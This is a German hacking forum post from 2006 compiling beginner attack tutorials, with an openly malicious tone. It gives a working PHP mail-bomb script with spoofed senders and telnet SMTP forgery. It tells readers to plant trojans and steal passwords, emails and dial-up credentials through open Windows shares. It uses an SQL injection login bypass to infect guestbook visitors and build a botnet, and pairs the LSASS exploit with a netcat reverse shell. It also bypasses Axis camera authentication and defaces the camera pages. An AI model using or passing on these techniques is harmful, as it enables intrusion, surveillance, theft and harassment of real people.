Verfügbare Informationen zu "Hackerbibel"
Qualität des Beitrags: Beteiligte Poster: 4dministr4t0r Forum: Newcomer - Board Forenbeschreibung: Forum für alle "Newcomer" (Alter, Geschlecht etc. egal), die sich im Bereich Systemsicherheit weiterbilden wollen. Chatten könnt Ihr am Ende der Seite! aus dem Unterforum: Tutorials (Info-Texte) Antworten: 1 Forum gestartet am: Samstag 23.12.2006 Sprache: deutsch Link zum Originaltopic: Hackerbibel Letzte Antwort: vor 17 Jahren, 3 Monaten, 23 Tagen, 21 Stunden, 53 Minuten
Alle Beiträge und Antworten zu "Hackerbibel"
Re: Hackerbibel
4dministr4t0r - 25.12.2006, 22:44Hackerbibel
##############################################################################################
Alle hier geposteten Tutorials sind im www zu finden und nicht von mir. Sie werden unverändert hier dargestellt.
Wir weisen ausdrücklich darauf hin, daß wir mit dieser Ansammlung nicht zu Straftaten aufrufen oder animieren wollen!!!
Alle Tutorials dienen ausschließlich zu Informationszwecken.
Solltest Du ein von Dir erstelltes Tutorial hier finden und mit der Veröffentlichung bei Hackressort nicht einverstanden sein, schick mir eine PM oder Email.
Das Tutorial wird dann entfernt.
Hackressort-Team
##############################################################################################
Inhalt
# Wichtig!
# Vorwort
# Getting Started…
# eMail Stuff
# SuperScan 3
# Shed – Freigaben Scanner
# Advanced Guestbook 2.2 - SQL Injection Exploit
# LSASS-Exploit
# Axis-Video-Server r00ted
# Google-Hacking
# NTPW-Hacken
# Retina Security Scanner
# Metasploit Framework – trans2open Exploit
# Nmap (by www.heisec.de)
# Optix 1.32 – Server bauen, stealthen, packen (by Boreas)
# Cross Site Scripting (XSS) (by GaSmo)
# Konsolenbefehle (CMD und Bash)
# Beige-Boxing – Outdoor Hacking
# Social Engineering - Risikofaktor Mensch (by moonwalker)
# Internet Explorer – Download & Execute (by GaSmo)
# Lokale Win2k/NT/Xp Passwörter Cracken
# URL-Faking (by GaSmo)
Wichtig!
Bei allen Bildern handelt es sich nur um Fotomontagen, die gemacht worden sind um die im Text beschriebenen Vorgänge besser nachvollziehen zu können. Weiterhin sind (fast) alle hier beschriebenen Vorgehensweisen illegal und somit nicht zum nachmachen gedacht.
Es sollen lediglich potentielle Möglichkeiten und Szenarien dargestellt werden. Ich habe die unten stehenden Aktionen nie begangen und bin für jegliche Vorfälle in Zusammenhang mit diesem Dokument nicht verantwortlich zu machen.
Wer damit nicht einverstanden ist, ist gezwungen dieses Dokument sofort zu schließen.
Vorwort
Also, Tach erstmal =D
Ich fang jetzt einfach mal an zu erzählen, warum ich diesen Text hier geschrieben hab und was hier so drinne steht. Ihr kennt doch sicher das 'Hackers Blackbook' oder 'Hackerz Book' und was weiß ich sonst noch alles, die coolen Hackerseiten im Netz mit Totenköpfen und den übelzten Hacker TutZ und am wichtigsten noch die ultra c00len Board-Hacker, die den ganzen Tag in irgendwelchen Bulletin-Boards sitzen und meinen sie wären die überkrassesten Hacker, aber wenn man sie denn mal was fragt, heißt es 'Nein, hacken ist illegal' oder 'Ich bin Security-Experte, ich kann dir bei solchen bösen Sachen nicht helfen'. So, in den Büchern steht nur Theorie-Müll, die TutZ sind (fast) alle für'n Arsch, da entweder zu alt, oder nur Theorie, was einem meistens auch nicht wirklich hilft. Und von den Board-Jungs (oder auch Mädels) haben im Schnitt 5% Ahnung vom Hacken, etc.
So, da sind wir schon beim nächsten Punkt, dem Hacken. Oder besser gesagt erstmal dem Wort. Wenn du ankommst und sagst 'Ich will hacken lernen', sagen dir die meisten du sollst dir 'ne Axt kaufen und in den Wald gehen. Woha, wie lustig. Deppen, die selber keinen Plan haben.
Und am schlimmsten sind immer noch die Tut-Trader. Leute die sagen 'Ja, ich hab ein Tut und kann dir sagen wie es geht, aber du bekommst es nicht. LaLaLaLa'. Und du willst doch eigentlich nur einen Server-Hacken oder ein bissel Scheiße im Internet machen. Und an dem Punkt wo ihr jetzt seid (schätze ich mal) hab ich mich auch mal befunden. Ich weiß wie lange es dauert, bis man etwas brauchbares findet. Also hab ich mir mal die Mühe gemacht und etwas (meiner Meinung nach) ziemlich hilfreiches für blutige Anfänger oder Leute die einfach mal was lernen wollen geschrieben.
Wie ihr mit diesem Guide umgeht ist eure Sache. Ihr könnt einfach alles nach Vorgabe machen, was kaputt machen und später genauso schlau sein wie vorher, oder ihr seht das ganze weniger als Schritt für Schritt Anleitung, sondern mehr als Denkanstoß für eigene Ideen.
So, das war's dann auch erstmal. Viel Spaß noch beim lesen…
Getting Started...
Also, ein paar Vorraussetzungen sollte jeder erfüllen, da ich hier auch nicht bei 0 anfangen kann. Aber keine Angst, ich versuche das ganze so simpel wie möglich zu halten.
Betriebssystem
Abgesehen vom CPU das Herz eines Computers. Oder besser das Gehirn. Naja, darüber lässt sich streiten =P Auf jeden Fall werde ich von Windows 2000 ausgehen. Wenn ihr WinXp habt klappt hoffentlich auch alles, aber bei Win9x/ME könnt ihr entweder aufhören diesen Text zu lesen (schlecht), oder euch Win2k draufmachen (besser). Ein herzliches 'Fuck-Off!' geht an alle m$-sucks Idioten =D
Gehirn
'Wenn du zur Elite gehören willst, musst du mit Verstand hacken, nicht unkontrolliert' =D Falls ihr ernsthaft hacken wollt, müsst ihr kreativ sein. Ihr werdet auf Probleme stoßen, bei denen nur total schräge Gedankengänge zum Ziel führen werden. Also, seid kreativ und benutzt euer Gehirn.
Lesen
Wollt ihr hacken, müsst ihr bereit sein zu lesen, viel zu lesen. Lest alles über PC, Netzwerk, Technik, etc. was euch in die Finger kommt.
Geduld
Es gibt viele Situation, bei denen ihr nicht sofort zum Ziel kommt. Nicht aufgeben und immer weiter versuchen, auch wenn es manchmal aussichtslos erscheint. Besonders Scannen kann oft sehr erfolglos sein.
DSL-Flat
Ihr brauch DSL und ihr braucht eine Flatrate. Hauptsächlich zum Massen-Scannen braucht ihr unbegrenzte Internet-Zeit/Datentransfer und so viel Bandbreite wie möglich.
Programmieren
Früher oder später werdet ihr lernen müssen zu programmieren. Das müsst ihr jetzt mal einfach so akzeptieren =P Aber in den Zeiten von Visual-Basic ist Programmieren auch keine allzu große Schwierigkeit mehr.
eMail Stuff
E-Mail's sind neben dem www das alltäglichste im Internet überhaupt. Deshalb fangen wir jetzt mal hier an. Ihr wolltet doch sicher schon mal eine eMail mit dem Absender g.schroeder@bundeskanzler.de oder sowas in der Art verschicken, jemandem 10000 eMail's schicken und sein Postfach verstopfen oder was auch immer. Dann zeig ich euch jetzt mal, wie das ganze geht.
Fake-Mails und Mailbomben über PHP-Scripte
Früher wurde das ganze über den SMTP-Service und Telnet gemacht. Heute findet man leider nur noch selten einen Server, den man dazu missbrauchen kann. Also hat man sich etwas neues einfallen lassen: Fake-Mails über PHP. Also, als erstes braucht ihr Webspace mit PHP-Unterstützung (zur Not einfach bei Tripod holen).
So, jetzt öffnet ihr das Notepad und erstellt folgende 2 Dateien. Erstmal die
tangoo.de.ms_massenmailer.php:
<?
/****************************************
* Bei Fragen: *
* http://www.tangoo.de.ms *
****************************************/
include("tangoo.de.ms_massenmailer_config.php");
//---------------- ** hier nichts mehr ändern !! ** ---------------------
if($send == ""){
echo "<link rel=stylesheet href=$style type=text/css>";
echo "<body bgcolor=$bgcol>";
echo "<font face=verdana color=$fontcol><small><small><br>";
echo "<p align=center>Tell a friend:</p>
<center><form method=POST action=tangoo.de.ms_massenmailer.php?send=yes&aid=yes>
<table border=0 cellpadding=5 cellspacing=0 style=border-collapse: collapse bordercolor=$cellf1 width=350>
<tr>
<td align=right width=183><font face=verdana color=FFFFFF><small><small>Anzahl Mails:</td>
<td width=167><input type=text name=anzahl size=20 style=\"color:$cellf2; background-color:$cellf3; border-width:1; border-style=Double;\"> </td>
</tr>
<tr>
<td align=right width=183><font face=verdana color=FFFFFF><small><small>Absender:</td>
<td width=167><input type=text name=absender size=20 style=\"color:$cellf2; background-color:$cellf3; border-width:1; border-style=Double;\"> </td>
</tr>
<tr>
<td align=right width=183><font face=verdana color=FFFFFF><small><small>Empfänger:</td>
<td width=167><input type=text name=receiver size=20 style=\"color:$cellf2; background-color:$cellf3; border-width:1; border-style=Double;\"> </td>
</tr>
<tr>
<td align=right width=183><font face=verdana color=FFFFFF><small><small>Betreff:</td>
<td width=167><input type=text name=betreff size=20 style=\"color:$cellf2; background-color:$cellf3; border-width:1; border-style=Double;\"> </td>
</tr>
<tr>
<td align=right width=183><font face=verdana color=FFFFFF><small><small>Text:</td>
<td><textarea name=nachricht rows=3 cols=20 style=\"color:$cellf2; background-color:$cellf3; border-width:1; border-style=Double;\"></textarea> </td>
</tr>
<tr>
<td align=right width=350 colspan=2>
<p align=center><input type=submit value=Submit name=B1 style=\"color:$cellf2; background-color:$cellf3; border-width:1; border-style=Double;\"> </td>
</table>
<p> </p>
</center>
</form>";
};
if($send == "yes"){
echo "<body bgcolor=$bgcol>";
echo "<center><font face=verdana color=$fontcol><small><small><br> >>> working >>> <br></br></center>";
$i = 0;
while ($i<$anzahl) {
mail("$receiver","$betreff","$nachricht","From:$absender");
print "<center>Status: $i mails versendet<br></center>";
$i++;
}
echo "<link rel=stylesheet href=$style type=text/css>";
echo "<center><font face=verdana color=$fontcol><small><small><br>$i Nachrichten erfolgreich verschickt!</center>";
echo "<p> </p>";
echo "<center><small><a href=http://www.tangoo.de.ms target=_blank><small><font face=Arial>Powered by TanGoo</font></small></a></small></center>";
};
?>
// Ende
tangoo.de.ms_massenmailer_config.php:
<?php
/************************************
* Bei Fragen: *
* http://www.tangoo.de.ms *
* *
*************************************/
//-------------------- ** Farbeinstellungen ** --------------------------
$bgcol = "#003F66"; // Hintergrundfarbe
$style = "style.css"; // Deine Stylesheet Datei
$fontcol = "#FFFFFF"; // Schriftfarbe
$cellf1 = "#111111"; // Zellenfarbe 1
$cellf2 = "#000000"; // Zellenfarbe 2
$cellf3 = "#00587D"; // Zellenfarbe 3
//-----------------------------------------------------------------------
?>
// Ende
Jetzt verbindet ihr euch auf euren FTP mit einem beliebigen FTP-Programm (zB. SmartFTP) und uppt die 2 Dateien. Fertig? Gut, jetzt nehmt ihr euren Browser und geht auf die Seite tangoo.de.ms_massenmailer.php, die ihr eben hochgeladen habt (zB. http://mitglied.tripod.de/euerbenutzername/tangoo.de.ms_massenmailer.php).
Tada, ihr habt jetzt ein schönes PHP-Script, bei dem ihr den Absender und die Anzahl der Mails einstellen könnt.
Fake-Mail's und Mailbomben über STMP-Server
Wie oben erwähnt liefen solche Späße früher über SMTP-Server. Nur leider ist die Möglichkeit einen beliebigen Absender zu wählen bei den meisten Servern gesperrt. Wie man immer noch einen findet und ihn dann für seine Zwecke missbrauchen kann, erkläre ich jetzt mal.
Mail-Server scannen
Also, erstmal sucht ihr einen IP-Bereich mit SuperScan nach offenen 25er Port's ab und speichert das Ergebnis. Auf Port 25 läuft der MailServer (zB. SendMail) und solche suchen wir ja. Wenn ihr nicht wisst, wie das geht, lest euch den Punkt 'SuperScan' durch. Jetzt öffnet ihr das LOG und ersetzt die Zeichnkette * + die vor allen IP's steht durch einen NullString. Ein NullString ist einfach eine leere (Null) Zeichnkette (String), also auf Deutsch durch NIX =D
Nun startet ihr mein kleines Programm, den 'Open Relay Scanner', klickt auf 'Open List' und ladet die List in das Programm. Jetzt nur noch bei 'rpct to:' eure eMail Adresse eintragen und auf 'Start Scan' klicken. Das Programm geht jetzt alle IP's durch, verbindet sich auf Port 25 und versucht eine eMail an euch zu schicken.
Ist der Scanner fertig, checkt eure eMails. Wenn ihr Glück habt, habt ihr eine eMail in der die IP von einem Server steht, den ihr benutzen könnt. Wenn ihr Pech habt, habt ihr keine neue eMail. Dann einfach eine neue IP-Range scannen und weiterversuchen.
Fake-Mail's über Telnet
Diese Methode ist nicht mehr ganz zeitgemäß, hat jedoch unglaublichen Style =P Klickt auf Start -> Ausführen... und gebt folgende ein 'telnet 123.123.123.123 25'. Die 123.123... IP müsst ihr natürlich durch die von eurem gescannten Server ersetzen. Enter drücken und ihr verbindet euch zum SMTP-Service des Server's. Jetzt tippt ihr erstmal 'helo gaylord' ein und sagt dem Server damit (was wohl =P) Hallo. Sind wir nicht nett? OK, jetzt tippen wir 'mail from: bill@gates.de' und sagen dem Server, dass wir eine Mail mit dem Absender bill@gates.de verschicken wollen. Dann tippen wir 'rcpt to: opfer@server.de' und sagen dem Server, dass die Mail an opfer@server.de gehen soll. Jetzt tippen wir 'data' ein und der Server sagt, dass wir anfangen können, die Mail zu schreiben. Wenn wir fertig sind, senden wir dem Server einen '.' in einer neuen Zeile. Die Mail wird jetzt versendet. Wollen wir noch einen Betreff angeben, tippen wir in einer Zeile ''subject: Das ist der Betreff', nachdem wir die Mail mit dem data-Befehl angefangen haben.
So, das war's auch schon mit dem Mail's faken über Telnet. Wenn man so ein paar mal eine Mail verschickt hat, kennt man die Befehle auch locker auswendig. Achso, und nur zur Sicherheit, die Anführungsstriche ' ' bei den Befahlen natürlich weglassen ;)
Fake-Mail's und Mailbomben über eMail-Bomber
Man könnte jetzt die in 4.2.2 beschriebenen Schritte 1000 mal wiederholen und so eine Mailbombe schicken, aber zum Glück gibt's dafür genug Programme im Internet. Ihr braucht nur einen Mail-Server (siehe 4.2.1). Hier mal eine kleine Auswahl an Programmen, deren Namen ihr einfach mal bei Google eintoppen könnt: Annomailer 3, Ghost Mail, MassMailer, X-Mas, Aenima, Euthan. Diese Programme bieten alle eine ziemlich einefache Benutzeroberfläche, so dass sich jeder zurechtfinden sollte.
SuperScan 3
SuperScan ist ein schneller PortScanner, der ganze IP-Ranges scannen kann. Wie man mit ihm umgeht erkläre ich euch am besten an einem kleinen Beispiel. Sagen wir mal, wir sind auf der suche nach Window's-Rechnern, auf die wir über den NTPW-Trick mit einem schwachen Passwort einloggen wollen. Das ganze läuft über den Pot 139 (NETBIOS Session Service). Also interessieren uns doch nur Rechner, die diesen Port offen haben, oder?
Besorgen wir uns erst mal einen IP-Bereich, den wir absuchen wollen. Dazu gehen wir entweder auf www.ipindex.de und suchen uns irgendeinen IP-Breich aus (ich bevorzuge welche aus 'Class C'), oder wir gehen auf www.ip-index.de und suchen uns einen IP-Breich aus einem bestimmten Land aus. Ich nehme jetzt mal an, dass wir uns für 195.53.0.0-195.53.255.255 entschieden haben.
Welche IP-Ranges zu empfehlen sind hängt ganz von euren Zielen ab. Wollt iht zB. auf Rechner von Privat-Nutzern, dann geht zu www.wasistmeineip.de oder lasst euch eure IP mit 'ipconfig /all' in der CMD anzeigen und geht von diesem Bereich aus (da von dort wahrscheinlich auch viele andere End-User eine IP zugeteilt bekommen haben).
Zielt ihr eher auf Webserver, dann sucht euch eine Webseite aus (bei google.de einfach irgendwas einippten =D), geht in die CMD, tippt 'ping <www.eureseite.blah>' ein und nimmt die angezeigte IP dann als Ausgangspunkt. Bekommt ihr zB. 62.67.212.17 angezeigt, scannt den Bereich 62.67.0.0-62.67.255.255, so einfach ist das =D
Jetzt könnt ihr SuperScan starten. Als erstes klicken wir auf 'Port list setup' und dann auf 'Clear All'. Jetzt scrollen wir die Portliste nach unten, bis wir bei Port 139 angekommen sind und markieren ihn mit einem Doppelklick. Wollen wir nach anderen Ports suchen, müssen wir natürlich diese markieren =P Jetzt auf 'OK' klicken und wir werden gefragt, ob wir die Liste speichern wollen. Hier könnt ihr selber entscheiden. Macht aber erst Sinn, wenn ihr ein paar Ports mehr ausgewählt habt. Ist der Port den ihr scannen wollt nicht dabei, müsst ihr ihn mit den Optionen oben links im Fenster einfach hinzufügen.
Nun müssen wir unseren IP-Bereich eintragen. Dazu schreiben wir zB. die '195.53.0.0' in die Textbox 'Start' (am linken Rand des Programms) und '195.53.255.255' in die Textbox 'Stop'. Klingt doch logisch, oder =D
In der Mitte bei 'Scan Type' wählen wir 'Only scan responsive pings', 'Show host responses' und dann noch 'All selected ports in list'. Jetzt nur noch auf 'Start' klicken und abwarten.
Ist das Programm am Ende angekommen (es kann auch sein, dass es zum Ende hin hängen bleibt, dann einfach 'Stop' drücken, die 2-3 IP's, die uns damit durch die Lappen gehen sind nicht so tragisch), klicken wir auf 'Prune' und löschen damit alle Host's, die keinen unserer ausgewählten Port's offen haben. Jetzt nur noch auf 'Save' klicken und die Liste speichern. Schon können wir sie an andere Programme weiterverfüttern (zB. X-Scan, Open Realay Scanner, Vuln. Scanner, etc.).
Hmmm, ein kleines Problem gibt es noch, wenn wir uns das LOG angucken, merken wir, dass vor jeder IP die Zeichenkette '* - ' steht. Damit kommen viele Programme nicht zurecht, also muss sie weg. Dazu einfach im Notepad auf 'Ersetzen...' klicken (Strg+H) und die Zeichenkette '* - ' durch nichts ersetzen. Abspeichern und fertig =D
Wenn ihr das LOG komplett von allen unwichtigen Sachen 'cleanen' woll, hab ich mal eine kleine .vbs Datei geschrieben. Einfach den Code in eine Textdatei schreiben und nicht als .txt, sondern als .vbs abspeichern. Dann das LOG von SuperScan auf die .vbs Datei schieben und schon bekommt ihr einen schönen Output =D
ipex.vbs
option explicit
'SuperScan 3 IP Extractor
'by p3pp3r
'www.p3pp3r.de.vu | www.ueberg33k.de.vu
dim fso
dim objargs
dim file_read
dim file_write
dim line
dim tmp
dim liste
set objargs = wscript.arguments
set fso = createobject("scripting.filesystemobject")
if objargs.count = 1 then
if right(objargs(0),3) = "txt" then
set file_read = fso.opentextfile(objargs(0))
do until file_read.atendofstream
line = file_read.readline
line = replace(line, "* - ", "")
line = replace(line, "* + ", "")
tmp = replace(line, ".", "")
if isnumeric(tmp) then liste = liste & line & vbcrlf
loop
if liste <> "" then
set file_write = fso.createtextfile(objargs(0) & ".ipfilter.txt")
file_write.write liste
file_write.close
msgbox "Fertig =D", vbinformation
else
msgbox "Keine Ip's gefunden.", vbinformation
end if
file_read.close
else
msgbox "Keine .txt Datei angegeben.", vbinformation
end if
else
msgbox "Script akzeptiert nur 1 Parameter.", vbinformation
end if
So, das war auch schon der Umgang mit SuperScan. Merkt euch die ganze Sache am besten ein bissel, denn darauf werde ich öfters zurückgreifen.
Shed - Freigaben im Internet
Warum wollen wir uns eigentlich immer in andere Rechner hacken? Viele Leute lassen die Tür zu ihrem Rechner weit offen stehen und geben und komplette Zugriff auf ihre ganze Festplatte, ganz ohne unser zutun. Das Problem liegt darin, dass Netzwerkfreigaben automatisch auch Internetfreigaben sind. Und das wissen die meisten eben nicht. Angenommen, dass jemand zuhause einen PC und einen Laptop hat und die Festplatten des PC's sind wegen Datensynchronisation mit dem Laptop immer freigegeben. Wenn der PC jetzt ins Internet geht, können wir auf diese Freigabe zugreifen und unser böses Unheil treiben =D
Die Suche nach solchen Freigaben erleichtert uns das Tool Shed. Startet das Shed, klickt auf 'Options' und macht alle Hacken weg, bis auf den bei 'Show Disks'. Denn wir wollen ja nach Festplatten scannen und nicht nach Druckern, oder was auch immer. Jetzt eine schöne IP-Range eintragen. Ab besten von Dial-Up Accounts, da uns Hauptziel für diesen Angriff ganz normale Heim-Benutzer sind. Wo ich immer fündig werde ist zB. 80.137.1.1-80.137.255.255. Jetzt nur noch auf 'Go' klicken und den Scanner laufen lassen.
Ist der Scanner fertig, sollen wir eine schöne Auswahl an Freigaben haben. Mit einem Doppelklick verbinden wir uns auf die Freigaben. Jetzt ist Gedult angesagt, da solche Freigaben meistens etwas langsam 'reagieren'. Was ihr jetzt machen wollt ist eurer Fantasie überlassen, aber ich hab mal ein paar Ideen für euch:
RAT/Trojaner installieren:
Einfach einen Server erstellen und in 'C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart' auf der Festplatte von unserem Opfer verschieben. Schon haben wir beim Neustart des Rechners wesentlich bequemere Kontrolle über den Rechner.
Nach Passwörtern suchen:
Einfach nach *pass*.* suchen. Viele User haben alle ihre Passwörter schön 'katalogisiert' =D
eMail's lesen:
Falls unser Opfer den Outlook-Express benutzt können wir uns einfach seine eMails saugen und dann angucken. Ist bestimmt was interessantes dabei =P Einfach alle .dbx Datei im Ordner 'C:\Dokumente und Einstellungen\USERNAME\Lokale Einstellungen\Anwendungsdaten\Identities\{KOMISCHE NUMMER =D}\Microsoft\Outlook Express' in den gleichen Odner bei uns auf der Festplatte kopieren. Jetzt Outlook-Express starten und eMails lesen =D
Einwahldaten klauen:
Guckt mal, ob die Datei 'adiras.ini' im Windows-Verzeichniss existiert. Wenn ja, dann benutzt euer Opfer ein AT-AR215 DSL-Modem und in der Datei werde ihr seine Einwahldaten finden :)
Eigene Dateien durchwühlen:
Einfach mal suchen, da findet man immer was Interessantes =P
Nett sein:
Erstellt doch einfach eine .txt Datei auf dem Desktop und schreibt rein, dass der USER seine Freigaben ausschalten soll :)
So, jetzt seid ihr dran, lasst euch was tolles einfallen =P Aber löscht auf keinen Fall sinnlos irgendwelche Dateien. Sowas ist echt assozial :|
Advanced Guestbook 2.2 - SQL Injection Exploit
Damit man immer schön auf dem Laufenden in Sachen Security ist, muss man öfters mal bei einschlägigen Security-Seiten vorbeigucken, ob es etwas wichtiges tolles neues gibt. Ganz wichtig ist das Ganze bei neuen public Exploits. Denn wenn man sie als einer der ersten hat, dann ist die Chance relativ hoch, viele verwundbare Server zu finden. So, dann gehn wir mal auf www.securityfocus.com oder www.securiteam.com und stöbern etwas im BUGTRAQ und was finden wir da? Ja, ein schönes SQL Injection Exploit für das 'Advanced Guestbook 2.2' :)
http://www.securityfocus.com/archive/1/360978
Ein bissel Englisch ist hierbei natürlich von Vorteil. Also dann, der Herr (oder Frau) JQ sagt uns, dass wir als Passwort einfach '') OR ('a' = 'a' eingeben müssen (ohne die äußeren ') und schon sind wir Admin im GBook. Kewl =D Aber ich kenne keinen, der das Advanced Guestbook benutzt? Hmmm, dann suchen ich mir einfach jemanden bei google.de =D
Da haben wir doch ca. 158000 Leute, die das Gästebuch benutzen. Jetzt einfach irgendjemanden aussuchen. Willkürliche Zerstörung. Das ist schön :)
Oben rechts auf der Seite ist auch schon ein kleiner Link mit der Aufschrift 'Administration'. Da klicken wir jetzt mal drauf und kommen zur Eingabe für Benutzername und Passwort. Beim Benutzernamen tragen wir nix ein und beim Passwort wie uns JQ beschreiben hat:
') OR ('a' = 'a
Und Schon sind wir Administrator im Gästebuch :)
Jetzt können wir ziemlich alles machen, was wir wollen. Eine nette Idee wäre jetzt, HTML zu aktivieren und ein IE Exploit in einen Beitrag einzubauen, der automatisch eine File runterlädt und ausführt. Einen kleinen Trojaner zum Beispiel. Würden wir das jetzt bei 10000 Gästebüchern machen und hätte pro Gästebuch 10 Leute, die den IE benutzen und bei denen der Trojaner ausgeführt wird, so hätte wir ein kleines =P Netzwerk von 100000 'Sklaven', die uns frei zur Verfügung stünden. Jaja, das wäre schön :) So, jetzt seid ihr dran. Verwundbare Gästebücher gibt's sicherlich noch genug. Have Phun =D
Sasser Wurm - Das LSASS-Exploit
Ihr habt doch sicher vom bösen, bösen Sasser-Wurm erfahren, der weltweit PC's infiziert hat, oder? Wenn nicht, könnt iht hier etwas darüber nachlesen:
http://www.heise.de/security/suche.shtml?type=hn&type=ha&T=Sasser&Suchen= los
Dieser Wurm macht sich ein Fehler vom LSASS in Windows 2k/XP zu nutzen um eine Remote-Shell auf den Opfer-PC zu bekommen und infiziert von dort aus dann weitere Computer im Internet. Natürlich gibt es für diese Sicherheitslücke auch ein Exploit für den Hausgebrauch, mit dem wir die Kontrolle über ungepatchte Systeme erhalten können =)
Scannen
Als erstes brauchen wir mal einen Scanner, der uns ungepatchtet Rechner im Internet sucht. Dazu nehmen wir den 'eEye Sasser Scanner'
http://www.eeye.com/html/Research/Tools/register.html?file=RetinaSasser
Nach etwas suchen findet man noch einen Scanner von Foundstone, mit dem wir schneller und mehr Ranges scannen können =D
http://www.foundstone.com/resources/freetools/dsscan.zip
Jetzt tippen wir mal eine IP-Range ein, zB. 217.82.19.1-217.82.19.254 und lassen das Programm mal schön scannen. Nix gefunden? Dann einfach den IP-Bereich änden ;)
Wenn wir einen oder mehrere Rechner gefunden haben, geht es weiter. Jetzt brauchen wir das Exploit, welches wir hier finden
http://www.k-otik.com/exploits/04292004.HOD-ms04011-lsasrv-expl.c.php
Aber natürlich habt ihr keinen blassen Schimmer von C und Assembler, oder? Aber da war jemand so nett und hat uns das Exploit gleich compiliert. Das könnt ihr dann hier finden
http://www.astalavista.com/?section=dir&cmd=file&id=1647
Eins Sache fehlt jetzt noch, NetCat. Das Programm wird auch oft als Schweizer Taschenmesser unter den Utilities bezeichnet, weil man es ziemlich vielseitig verwenden kann
http://www.atstake.com/research/tools/network_utilities/
Let'zzz exploit =D
Alles zusammen? Gut, dann gehn wir jetzt in die Konsole, wechseln in das Verzeichnis von NetCat und tippen folgendes ein 'nc -L - p 2406'. Damit sagen wir nc, das es auf Port 2406 auf eingehende verbindungen warten soll ( L - listen, p - port).
Machen wir noch eine Konsole auf und starten das Exploit. Jetzt wir uns gesagt, wie wir es anzuwenden haben. Nehmen wir und also ein IP, die und Retina als verwundbar identifiziert hat und tippen in die Konsole 'exp 0 IP-DES-OPFERS 2406 EURE-IP -t'. Mit der Option -t identifiziert das Exploit erstmal das Betriebssystem, denn je nach OS muss ein anderer Offset benutzt werden. In meinem Beispiel läuft auf dem PC WinNT 5.1 = WinXP. Also Tippe ich nochmal die Zeile von eben (oder drücke auf den Pfeiltasten nach oben =P) und lasse diesmal das -t weg. Würde auf dem Opfer-PC zB. Win2k laufen, müsste ich die 0 in eine 1 ändern. Steht aber alles in der Beschreibung und ihr könnt ja lesen, oder =D
Tada ^_^ Wenn alles geklappt hat, steht in eurem NetCat-Fenster jetzt sowas wie 'Microsoft Windows XP [Version 5.1.2600..blah..blub...'. Ich gratuliere zu eurem ganz persönlichem und eigenem Reverse-Command-Shell. Tolles Wort =D (Lasst euch bei dem Screenshot nicht von dem Ordnernamen 'WIN98' verwirren, es ist ein Xp-Rechner ;)
Troubleshooting
Solltet ihr Probleme mit NetCat haben, dann guckt ob ihr bei eurem Router (falls ihr einen habt) den Port für die Reverse-Shell (im Beispiel 2406) auch für eingehende Verbindungen freigeschaltet habt.
AXIS Video Server r00ted - Powered by GoogleDorks
AXIS ist eine Firma, die Überwachungskameras und Videoserver (teilweise Beides ineinander integriert) anbietet. Um diese Server dreht sich der folgende Abschnitte. Wir werden uns erst mal angucken, was dort so los ist, dann werden wir Admin vom Video-System, danach vom FTP-Server und dann starten wir Telnet und werden Server-Admin mit vollen Rechten für alles. Hört sich gut an, oder =P
Also, als erstes brauchen wir ein Ziel, das wir angreifen wollen. Da die Überwachungskameras von AXIS anscheinend ein richtiger Kassenschlager sind, finden wir Cam's die ans Webangebunden sind ganz leicht und in hülle und fülle dank GoogleDorks =D Bei GoogleDorks wurde der Suchstring 'inurl:indexFrame.shtml Axis' angegeben, aber ich finde 'intitle:"AXIS Video Server"' bringt wesentlich mehr Hit's =P
Nun ist es wohl an der Zeit sich einen Server auszusuchen. Was auch ganz interessant ist, ist einfach mal zu gucken, was man auf den Kameras so zu sehen bekommt =). Sind teilweise ganz unterhaltsame Dinge dabei =P Wählen wir einfach mal einen aus.
*hrrrr* Sieht aus wie, hmmm, Krankenhaus? Filmstudio hinter den Kulisssen? Irgendein Büro? Naja, das ist jetzt egal =P Wir haben nun 2 Möglichkeiten in das Admin-Panel der Software zu kommen
Let'zzz exploit =D
Schlaue Menschen haben herausgefunden, dass man hinter die Kamera IP einfach '//admin/admin.shtml' setzen muss (// ist kein Schreibfehler =P) und schon ist des Authentifizierungs-Mechanismus außer Kraft gesetzt. Wenn alles geklappt hat befinden wir und nun im Admin-Panel. Sollte es nicht klappen (404 Not Found), dann könnt ihr die unten stehenden URL's ausprobieren um an Ziel zu kommen:
http://camera-ip//admin/img_general.shtml
http://camera-ip//admin/netw_tcp.shtml
http://camera-ip//admin/sys_date.shtml
http://camera-ip//admin/com_port.shtml
http://camera-ip//admin/op_general.shtml
http://camera-ip//admin/sys_motiond.shtml
Solltet ihr jetzt immer noch kein Admin sein, dann mach der echte Admin seine Arbeit gut und bring die Kamera-Firmware immer auf den neusten Stand. Das Exploit ist also unbrauchbar, aber eine Chance haben wir noch, weiter zu Möglichkeit 2.
Das Traumpaar – root:pass
Einfach auf den kleinen 'Admin'-Button klicken und das Standartpasswort ausprobieren. Der Benutzername ist 'root' und das Passwort ist 'pass' (natürlich ohne ''). Viele Admin's sind entweder zu faul das Passwort zu ändern oder denken einfach gar nicht daran. Naja, unser Glück =P
time2deface
Sollte der 'Einbruch' geglückt sein, sieht es jetzt so bei euch aus, wenn nicht, einfach einen anderen Server versuchen. Klappt bei mir auch nicht immer beim ersten Versuch ;)
Nun schlagen wir erst mal den Lamer-Weg ein =P Klickt dazu auf 'Video Server' (oben links auf das kleine Bild =D) und dann auf 'Layout'. Im neuen Fenster machen wir einen Hacken bei 'Enable Personal Settings' und können die Video-Server-Page dann unseren Wünschen anpassen =D
Ein kleiner Hinweis auf die Sicherheitslücke oder das Logo von eurer Crew (falls ihr eine habt) oder eure Geschlechtsteile als Hintergrundbild oder ... Lassen wir das =D Wie ihr seht sind eurer Fantasie keine Grenzen gesetzt.
Aber was haben wir nun davon? Eigentlich nix =P Jetzt haben wir die Page 'defaced'. Toll, oder =D Aber wir wollen mehr. Der 'Heilige Grahl' beim Server hacken ist eine Shell mit root-Rechten. Damit sind wir (in)offizieller Besitzer des gesammten Server's und können tun und lassen, was wir wollen. Also lassen wir das Design der Page so wie es ist und kümmern uns um die Ausweitung unserer Rechte =D
Zeit zum Expandieren…
